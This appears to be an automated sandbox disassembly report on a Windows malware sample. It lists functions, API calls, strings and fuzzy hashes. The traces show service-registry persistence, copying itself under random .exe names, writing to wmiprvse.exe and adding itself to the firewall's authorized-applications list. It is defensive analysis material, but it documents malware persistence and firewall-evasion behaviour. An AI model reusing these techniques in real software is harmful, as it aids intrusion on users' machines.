Instruction Fuzzy Hash: 5A02C57050C380DAE310CB74DD48B5BBBE5AB95704F04492DF6D5A72E2D7BA9808CB6B

Function 00402B40 Relevance: 51.0, APIs: 12, Strings: 17, Instructions: 217stringlibraryfileCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000047), ref: 00402BF5
GetProcAddress.KERNEL32(00000000), ref: 00402BFC
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402C1F
strncmp.MSVCRT ref: 00402C44
lstrcatA.KERNEL32(?,004084F4), ref: 00402CD0
lstrcatA.KERNEL32(?,?), ref: 00402CE0
CopyFileA.KERNEL32(?,?,00000000), ref: 00402CF1
lstrcpyA.KERNEL32(?,?), ref: 00402D14
GetLastError.KERNEL32 ref: 00402D8F
lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402DE1
lstrcatA.KERNEL32(?,?), ref: 00402DEF
lstrlenA.KERNEL32(00402AB1), ref: 00402E0E

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Strings

<6@, xrefs: 00402CB5
N, xrefs: 00402BC0
M, xrefs: 00402B7C
t, xrefs: 00402B75
F, xrefs: 00402BA6
d, xrefs: 00402B8A
u, xrefs: 00402B91
a, xrefs: 00402BC7
G, xrefs: 00402B66
%c%c%c%c%c%c.exe, xrefs: 00402CA9
o, xrefs: 00402B83
i, xrefs: 00402BAD
SYSTEM\CurrentControlSet\Services\, xrefs: 00402DD5
m, xrefs: 00402BCE
kernel32.dll, xrefs: 00402BF0
Description, xrefs: 00402E1A
A, xrefs: 00402BDB

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: lstrcat$lstrcpy$AddressCopyCountDirectoryErrorFileLastLibraryLoadProcSystemTicklstrlenrandstrncmp
String ID: %c%c%c%c%c%c.exe$<6@$A$Description$F$G$M$N$SYSTEM\CurrentControlSet\Services\$a$d$i$kernel32.dll$m$o$t$u
API String ID: 2930506891-2104832695
Opcode ID: 79df84dcddb17782a356b93d0bf0c5b2b01855d991385c97858fe82d4394e814
Instruction ID: a50e26587b69554a2a762d444c19ea56879ec6abf88ed33a43cf8b764e003199
Opcode Fuzzy Hash: 79df84dcddb17782a356b93d0bf0c5b2b01855d991385c97858fe82d4394e814
Instruction Fuzzy Hash: 10812BB2900258ABD721DB60DD89FDEBB7CAF55B00F0401E9F609B61C2D6B45B84CF69

Function 00402520 Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 196stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(?,SYSTEM\CurrentControlSet\Services\), ref: 00402533
lstrcatA.KERNEL32(?,100200), ref: 00402543
RtlZeroMemory.KERNEL32 ref: 00402587

Strings

SYSTEM\CurrentControlSet\Services\, xrefs: 0040252D
F7@, xrefs: 0040255F
100200, xrefs: 0040253D, 004026DE, 004026EB
47@, xrefs: 004025A5
"7@, xrefs: 004025B4, 004025CB
ImagePath, xrefs: 0040259F

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: MemoryZerolstrcatlstrcpy
String ID: "7@$100200$47@$F7@$ImagePath$SYSTEM\CurrentControlSet\Services\
API String ID: 1768957353-3519508139
Opcode ID: 8a600dd736f3a178a13575e9a99342727ac9e09ed908883fd0121ec29af1dff4
Instruction ID: a495424809a9f9f54fedb59a1f20414eed3fe88150acac704cb64e1485c9eeb3
Opcode Fuzzy Hash: 8a600dd736f3a178a13575e9a99342727ac9e09ed908883fd0121ec29af1dff4
Instruction Fuzzy Hash: 8C51B435780305AFE320DB34ED49FEB37A8EB84721F504839FA46E11D0E6BD9519866D

Function 7FE3307C Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 292filelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(7FE33071), ref: 7FE3307C
GetSystemDirectoryA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000104), ref: 7FE33093
CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
"', xrefs: 7FE33114
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33092, 7FE330A2, 7FE330D3, 7FE330EE
ADVAPI32.DLL, xrefs: 7FE3313A

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: FileHandle$AddressCloseCountCreateDirectoryInformationLibraryLoadModuleProcSystemTickVolumeWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 1729360627-4128452508
Opcode ID: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction ID: 6b64a43cb509898f68348655a96a0e184e2e065f58832200b8bd953c97f5cb1b
Opcode Fuzzy Hash: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction Fuzzy Hash: 2591F271954358BFEB269F20CC0EFEA3B6CDF41311F80011AED5A9A081DAF46F06D6A5

Function 009B307C Relevance: 37.0, APIs: 15, Strings: 6, Instructions: 292filelibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(009B3071), ref: 009B307C
GetSystemDirectoryA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000104), ref: 009B3093
CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 009B30D4
WriteFile.KERNEL32(00000000,009B3EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 009B30F6
CloseHandle.KERNEL32(?,00000003), ref: 009B30FC
GetProcAddress.KERNEL32(00000000,009B311D), ref: 009B3128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 009B313B
GetTickCount.KERNEL32 ref: 009B316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,009B637A,00000000,00000000,00000000,00000000), ref: 009B3241

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 009B3092, 009B30A2, 009B30D3, 009B30EE
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B330F
hell32.dll,-1, xrefs: 009B328E, 009B330E
ADVAPI32.DLL, xrefs: 009B313A
"', xrefs: 009B3114
"', xrefs: 009B32BA

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: FileHandle$AddressCloseCountCreateDirectoryInformationLibraryLoadModuleProcSystemTickVolumeWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 1729360627-4128452508
Opcode ID: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction ID: 6caefc344f5001224ce507a28f4b08f2ee6ad13940b5968d14fb8ba2a122b955
Opcode Fuzzy Hash: 19b44635278fe99a4415179c49d6eb8c4f8a4d309380675498a1a4a2d9bdcc0e
Instruction Fuzzy Hash: 88912671544748BFEB26AF24CD0ABEA3B6CDF41320F40411AFD559E082DBF45F0686A5

Function 7FE330AB Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 273stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE3309E), ref: 7FE330AC

Part of subcall function 7FE330BE: lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE330B7), ref: 7FE330BF
Part of subcall function 7FE330BE: CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
Part of subcall function 7FE330BE: WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
Part of subcall function 7FE330BE: CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
Part of subcall function 7FE330BE: GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
Part of subcall function 7FE330BE: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
Part of subcall function 7FE330BE: GetTickCount.KERNEL32 ref: 7FE3316F

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
"', xrefs: 7FE33114
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330AB, 7FE330D3, 7FE330EE
ADVAPI32.DLL, xrefs: 7FE3313A

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: Filelstrcat$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 4135777234-4128452508
Opcode ID: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction ID: f56c8c8788c1527792fd5fee25e748029393f3a60fbf17811963ed314d73609c
Opcode Fuzzy Hash: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction Fuzzy Hash: 9091F171944718BFEB269F208C0EFEA3B6CDF41311F80011AED5A9E081DAF4AF05D6A5

Function 009B30AB Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 273stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,009B309E), ref: 009B30AC

Part of subcall function 009B30BE: lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,009B30B7), ref: 009B30BF
Part of subcall function 009B30BE: CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 009B30D4
Part of subcall function 009B30BE: WriteFile.KERNEL32(00000000,009B3EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 009B30F6
Part of subcall function 009B30BE: CloseHandle.KERNEL32(?,00000003), ref: 009B30FC
Part of subcall function 009B30BE: GetProcAddress.KERNEL32(00000000,009B311D), ref: 009B3128
Part of subcall function 009B30BE: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 009B313B
Part of subcall function 009B30BE: GetTickCount.KERNEL32 ref: 009B316F

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 009B30AB, 009B30D3, 009B30EE
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B330F
hell32.dll,-1, xrefs: 009B328E, 009B330E
ADVAPI32.DLL, xrefs: 009B313A
"', xrefs: 009B3114
"', xrefs: 009B32BA

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: Filelstrcat$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 4135777234-4128452508
Opcode ID: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction ID: 043d4b618333234daff30f76f4c46a29e867717007945118204f0c53a83e1371
Opcode Fuzzy Hash: 6958d413b6abf8e1b28038c6610194ed2bae6efbd87a574ee0b1bcde9ea0452d
Instruction Fuzzy Hash: 0091F471554748BFEB26AF24CD0EBEA3BACDF41321F40411AFD199E081DAF45F0686A5

Function 7FE330BE Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 264filelibrarystringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE330B7), ref: 7FE330BF
CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 7FE330D4
WriteFile.KERNEL32(00000000,7FE33EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 7FE330F6
CloseHandle.KERNEL32(?,00000003), ref: 7FE330FC
GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
"', xrefs: 7FE33114
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE330BE, 7FE330D3, 7FE330EE
ADVAPI32.DLL, xrefs: 7FE3313A

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleInformationLibraryLoadProcTickVolumeWritelstrcat
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 3969241177-4128452508
Opcode ID: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction ID: 09541bb4dc3411c55ab005cb888b55fbb50cd13fbca17e3ae23e295a94b6b269
Opcode Fuzzy Hash: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction Fuzzy Hash: 7281BE71914718BFEB269F208C0EFEA3B6DDF41311F80011AED5A9E081EAF46F05D6A5

Function 009B30BE Relevance: 35.3, APIs: 14, Strings: 6, Instructions: 264filelibrarystringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,009B30B7), ref: 009B30BF
CreateFileA.KERNEL32(C:\Windows\sysWOW64\wbem\wmiprvse.exe,40000000,00000000,00000000,00000003,00000000,00000000), ref: 009B30D4
WriteFile.KERNEL32(00000000,009B3EDB,00000019,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,00000000), ref: 009B30F6
CloseHandle.KERNEL32(?,00000003), ref: 009B30FC
GetProcAddress.KERNEL32(00000000,009B311D), ref: 009B3128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 009B313B
GetTickCount.KERNEL32 ref: 009B316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,009B637A,00000000,00000000,00000000,00000000), ref: 009B3241

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 009B30BE, 009B30D3, 009B30EE
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B330F
hell32.dll,-1, xrefs: 009B328E, 009B330E
ADVAPI32.DLL, xrefs: 009B313A
"', xrefs: 009B3114
"', xrefs: 009B32BA

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleInformationLibraryLoadProcTickVolumeWritelstrcat
String ID: "'$"'$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 3969241177-4128452508
Opcode ID: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction ID: 877e650b612f49487860015164acf66199780f3d8cb19279b678bb0b8beeb4d8
Opcode Fuzzy Hash: e99baabed080411f04b0d806c93d617434853b94cdc5a730a8b5d052636699dc
Instruction Fuzzy Hash: 2A81E371554708BFEB26AF24CD0EBEA37ACEF41321F40411AFD199E081EAF46F0586A5

Function 00402330 Relevance: 35.1, APIs: 6, Strings: 14, Instructions: 69librarystringloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0040239F
GetProcAddress.KERNEL32(00000000), ref: 004023A6
GetTempPathA.KERNEL32(00000104,?), ref: 004023DE
lstrcatA.KERNEL32(?,SOFTWARE.LOG), ref: 004023F1
MoveFileExA.KERNEL32(?,?,00000003(MOVEFILE_REPLACE_EXISTING|MOVEFILE_COPY_ALLOWED)), ref: 0040240C
MoveFileExA.KERNEL32(?,00000000,00000005(MOVEFILE_REPLACE_EXISTING|MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040241E

Strings

t, xrefs: 0040235B
m, xrefs: 00402390
i, xrefs: 0040237D
o, xrefs: 00402365
M, xrefs: 00402360
G, xrefs: 00402356
a, xrefs: 0040238B
A, xrefs: 00402395
u, xrefs: 0040236F
kernel32.dll, xrefs: 00402351
d, xrefs: 0040236A
F, xrefs: 00402378
SOFTWARE.LOG, xrefs: 004023EB
N, xrefs: 00402386

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
